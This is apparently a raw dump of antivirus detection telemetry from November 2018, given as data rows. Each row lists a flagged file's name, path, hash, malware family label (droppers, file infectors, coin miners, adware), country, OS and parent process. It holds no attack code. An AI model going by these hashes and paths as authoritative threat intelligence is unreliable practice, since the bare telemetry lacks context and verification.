  Row(detection=Row(filename='avscan-20181101-182551-31efc07f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182551-31EFC07F', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182527-2de4e438', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182527-2DE4E438', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182427-23be5544', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182427-23BE5544', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:24:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-182501-296001ae', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_836b6955\\AVSCAN-20181101-182243-1213B2D6\\AVSCAN-20181101-182501-296001AE', filesize=2944000, name='TR/Dropper.MSIL.Gen.#M1.#R1'), hash='c76d46252236f45d25880eb78c70ba71eae66004af87257fc1541dcf6d680206', metadata=Row(cmdline=None, country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T17:25:02Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='c770c4431647e097600953a9a34392e9da29f8a3de5dd3adce98dc3bc5872ca0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\C770C4431647E097600953A9A34392E9DA29F8A3DE5DD3ADCE98DC3BC5872CA0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c770c4431647e097600953a9a34392e9da29f8a3de5dd3adce98dc3bc5872ca0', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:08Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='rc_11n_wr841n_nd.dll', filepath='g:\\$recycle.bin\\s-1-5-21-536075318-3838402433-1439967234-1000\\$rwv2xs2\\برامج\\متنوعة\\cd113a5\\easysetupassistant\\wr741n\\tlres\\1032\\RC_11N_WR841N_ND.dll', filesize=1536000, name='W32/Ramnit.C.#M1.#R1'), hash='c777e7f4dfbf0815933a4a20b830c585c5c8562f37ef0f3c32be6dbfcc3a2f43', metadata=Row(cmdline=None, country='SA', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:59:56Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-170027-5e989fbd', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_1831079a\\AVSCAN-20181101-165915-53313C4A\\AVSCAN-20181101-170027-5E989FBD', filesize=1088000, name='ADWARE/MultiPlug.Gen7.#M1.#R1'), hash='c7b3c1972f7d4f5faeccafd711e339afe1c7dff2a78dba717b32d6af552aa1fb', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T16:00:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104626-b815a0a5', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_6d665385\\AVSCAN-20181101-102008-C9BE8594\\AVSCAN-20181101-104626-B815A0A5', filesize=604000, name='HEUR/APC.#M1.#R1'), hash='c7e099ed50c207a6082863ad67bcdd93ccb0470bd180060a08cf8682736be6ce', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T00:46:36Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='setup.exe', filepath='D:\\BKP HD\\Lixo 2\\Desktop 2015\\BKP Servidor\\Caio\\Samsung Preto\\BLUETOOTH\\Broadcom\\Win32\\Setup.exe', filesize=948000, name='W32/Neshta.A.#M1.#R1'), hash='c81005e719178679bfca09c24ca4ca34988510dc79fbe8af5199e46013f04d02', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe5_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe5 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-01T12:36:22Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161523-247a3a2f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2804ac6e\\AVSCAN-20181101-161343-1855E7FE\\AVSCAN-20181101-161523-247A3A2F', filesize=428000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='c84998229679dc65320b08c7fba5ac11320fe678a9d128b954feb1e0381df890', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:45:28Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162848-86b29ab6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2804ac6e\\AVSCAN-20181101-161343-1855E7FE\\AVSCAN-20181101-162848-86B29AB6', filesize=428000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='c84998229679dc65320b08c7fba5ac11320fe678a9d128b954feb1e0381df890', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:58:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-161953-457b1760', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2804ac6e\\AVSCAN-20181101-161343-1855E7FE\\AVSCAN-20181101-161953-457B1760', filesize=428000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='c84998229679dc65320b08c7fba5ac11320fe678a9d128b954feb1e0381df890', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:49:58Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-162006-46f70a1f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_2804ac6e\\AVSCAN-20181101-161343-1855E7FE\\AVSCAN-20181101-162006-46F70A1F', filesize=428000, name='PUA/OpenCandy.Gen.#M300.#R6753'), hash='c84998229679dc65320b08c7fba5ac11320fe678a9d128b954feb1e0381df890', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:50:10Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='spywareterminatorsetup.2.exe', filepath='\\\\?\\E:\\virus\\SpywareTerminatorSetup.2.exe', filesize=8152000, name='W32/Neshta.A.#M1.#R1'), hash='c88d6df0a77a3285bd7c7443575f480634acfc322d1208c780a7f8813d7daf6a', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T14:46:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='193df7a79e2a22984e7c48a5b9ecdcb71f9b3b6f', filepath='\\\\?\\c:\\users\\X\\appdata\\local\\temp\\2\\193df7a79e2a22984e7c48a5b9ecdcb71f9b3b6f', filesize=1536000, name='W32/Virut.Gen.#M1.#R1'), hash='c92ef8c1f5cffa1ba39451667e8553086fc53a2c325c39adb7d18ccc2fc317b4', metadata=Row(cmdline=None, country='US', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T08:37:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222701-6ea70d86', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222645-6533CACD\\AVSCAN-20181101-222701-6EA70D86', filesize=640000, name='TR/RedCap.xaclj.#M1.#R1'), hash='c980ed2cdf5a796dd132a46207a4e3e5f03675d66c465cff0294dad34b9591c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222701-6e9e19d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222645-6533CACD\\AVSCAN-20181101-222701-6E9E19D9', filesize=640000, name='TR/RedCap.xaclj.#M1.#R1'), hash='c980ed2cdf5a796dd132a46207a4e3e5f03675d66c465cff0294dad34b9591c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:27:00Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222653-69d8e3c7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222645-6533CACD\\AVSCAN-20181101-222653-69D8E3C7', filesize=640000, name='TR/RedCap.xaclj.#M1.#R1'), hash='c980ed2cdf5a796dd132a46207a4e3e5f03675d66c465cff0294dad34b9591c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:26:52Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-222656-6b8b0f53', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181101-222645-6533CACD\\AVSCAN-20181101-222656-6B8B0F53', filesize=640000, name='TR/RedCap.xaclj.#M1.#R1'), hash='c980ed2cdf5a796dd132a46207a4e3e5f03675d66c465cff0294dad34b9591c4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T21:26:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{3B9E88D2-9758-44D3-86CB-1997B79D85E1}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='ca57942d852ffcdd4a83d3b3ebdbcf3a03f24273ff60857b276c0e568232abb1', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T00:59:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='ethdcrminer64.exe', filepath='\\\\?\\C:\\$RECYCLE.BIN\\S-1-5-21-153897562-1265273997-1534562455-1001\\$R31G5FB.3\\cuda7.5\\EthDcrMiner64.exe', filesize=5696000, name='HEUR/AGEN.1033248.#M1.#R1'), hash='caac48aa46538bc5815b44512a284c41de7a293e9bcc27ff64aef7e3c7622ec7', metadata=Row(cmdline=None, country='CA', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T09:19:54Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cae8e744aef46779873844c5a4e2e388c78494a08167ef766ad7f668a7aa7697', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-32\\CAE8E744AEF46779873844C5A4E2E388C78494A08167EF766AD7F668A7AA7697', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cae8e744aef46779873844c5a4e2e388c78494a08167ef766ad7f668a7aa7697', metadata=Row(cmdline='x -iext -ow -ver \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-36.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-31.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-32.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-33.7z\\\\\\" \\\\\\"-an=C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-34.7z\\\\\\" -- \\\\\\"C:\\\\\\\\Users\\\\\\\\Admin\\\\\\\\Downloads\\\\\\\\Binaries 31.10.2018-35.7z\\\\\\" \\\\\\"?\\\\\\\\\\\\\\"', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\WinRAR\\WinRAR.exe', parentsize=1407440, timestamp='2018-11-01T15:09:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_farngei.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{7C63A674-7475-4F34-AAD8-AB6ADBE6A158}\\E_FARNGEI.EXE', filesize=256000, name='W32/Alman.BB.#M1.#R1'), hash='cb2da8e0195615e58b563efc9de645ba81d451d481389a639afeb5dcc13bb960', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:00:12Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='tbb.dll', filepath='C:\\Program Files (x86)\\Adobe\\Adobe Utilities - CS5\\Pixel Bender Toolkit 2\\tbb.dll', filesize=320000, name='W32/Nimnul.D.#M1.#R1'), hash='cb6fb8e4d92400da3a7030d32f1651b0a9e1a066953a412cd034775287a16a64', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T07:10:50Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='click.exe', filepath='C:\\Users\\X\\Desktop\\Juegos\\click.exe', filesize=3840000, name='HEUR/AGEN.1027581.#M1.#R1'), hash='cb9b6b99d68c0c040ccb00a14ff7271d5860de99b2827c1b9feb73cfc69518ee', metadata=Row(cmdline=None, country='VE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-01T14:09:01Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='pokemon h  dx9.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\Rar$EXa0.515\\Hand v9\\Pokemon H  DX9.exe', filesize=5568000, name='W32/Virut.Gen.#M1.#R1'), hash='cbdf4b1a48886bd5b0bca51b1caa8461d6030bc1aec02d9bfd5e52532105ef05', metadata=Row(cmdline='\\\\\\/MONITOR', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner.exe', parentsize=7347928, timestamp='2018-11-01T00:10:14Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='a0n0no002205_pfr.rar.exe', filepath='D:\\je me sens mal\\A0n0no002205_pfr.rar.exe', filesize=72000, name='HEUR/AGEN.1028380.#M1.#R1'), hash='cbe8c17d74ba87caeffb5e6f1af1a1c8cbc8dbc0bea47e5335cb05e46963e384', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe', parentsize=510928, timestamp='2018-11-01T09:46:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-104736-4f18d0fe', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_cce6a299\\AVSCAN-20181101-104725-4CF1D47E\\AVSCAN-20181101-104736-4F18D0FE', filesize=72000, name='PUA/Downloader.Gen.#M1.#R1'), hash='cbe8c17d74ba87caeffb5e6f1af1a1c8cbc8dbc0bea47e5335cb05e46963e384', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-01T09:47:37Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='cc0478ea881650a4b1f1ed5e332aa9e91302e79913b1e9417754e4f55404512a', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 30.10.2018-31\\CC0478EA881650A4B1F1ED5E332AA9E91302E79913B1E9417754E4F55404512A', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='cc0478ea881650a4b1f1ed5e332aa9e91302e79913b1e9417754e4f55404512a', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T11:12:16Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-183144-454427db', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5a6b3617\\AVSCAN-20181101-183054-3DAB933E\\AVSCAN-20181101-183144-454427DB', filesize=64000, name='VBA/Dldr.Agent.hgyym.#M1.#R1'), hash='cc0c14f660c2972092b60816431960efcb3ee991bdbdf1d396405b3d49433c51', metadata=Row(cmdline=None, country='RO', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-01T16:31:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='$rm30cjh', filepath='C:\\$Recycle.Bin\\S-1-5-21-1024011789-1237596223-2747892489-21661\\$RM30CJH', filesize=64000, name='VBA/Dldr.Agent.hgyym.#M1.#R1'), hash='cc0c14f660c2972092b60816431960efcb3ee991bdbdf1d396405b3d49433c51', metadata=Row(cmdline=None, country='NL', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8694408, timestamp='2018-11-01T15:52:55Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='cc11dae64dc422c4d2d0e86d26c0915017c7ac4ce6516e6321ad26304bae7138', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-01T05:03:49Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235722-049e48d9', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235722-049E48D9', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:54:19Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline='\\\\\\"C:\\\\\\\\Users\\\\\\\\X\\\\\\\\Desktop\\\\\\\\Download\\\\\\\\Vavoo TCoreXxx Highlight-Bundle - 2018-05-30.rar\\\\\\"', country='AT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\WinZip\\winzip64.exe', parentsize=92632704, timestamp='2018-11-01T09:20:26Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T13:01:42Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='\\\\?\\C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:25:32Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235644-fe6e8497', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235644-FE6E8497', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:53:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140_30ab8c89.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140_30ab8c89.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140_30ab8c89.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140_30ab8c89.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140_30ab8c89_bd613be2.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140_30ab8c89_bd613be2.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:47Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_1e767269.exe', filepath='\\\\?\\C:\\Applications\\Service_1e767269.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_1e394c91.vir', filepath='\\\\?\\C:\\Applications\\Service_1e394c91.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140.vir', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_2e9b0140.exe', filepath='\\\\?\\C:\\Applications\\Service_2e9b0140.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:45Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='avscan-20181101-235713-032c7654', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_13e463c9\\AVSCAN-20181101-233541-30FB1C20\\AVSCAN-20181101-235713-032C7654', filesize=14208000, name='TR/CoinMiner.uwtkf.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T21:54:11Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.exe', filepath='C:\\Applications\\Service.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-01T09:12:39Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service.vir', filepath='\\\\?\\C:\\Applications\\Service.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:41Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_1e394c91.vir', filepath='\\\\?\\C:\\Applications\\Service_1e394c91.VIR', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:44Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='service_1e767269.exe', filepath='\\\\?\\C:\\Applications\\Service_1e767269.exe', filesize=14208000, name='HEUR/AGEN.1011898.#M1.#R1'), hash='cc1bacb51504c5d20b1731381216a48412d4950f233e7010b46dcc5f2216e345', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:21:44Z'), dt=datetime.date(2018, 11, 1)),
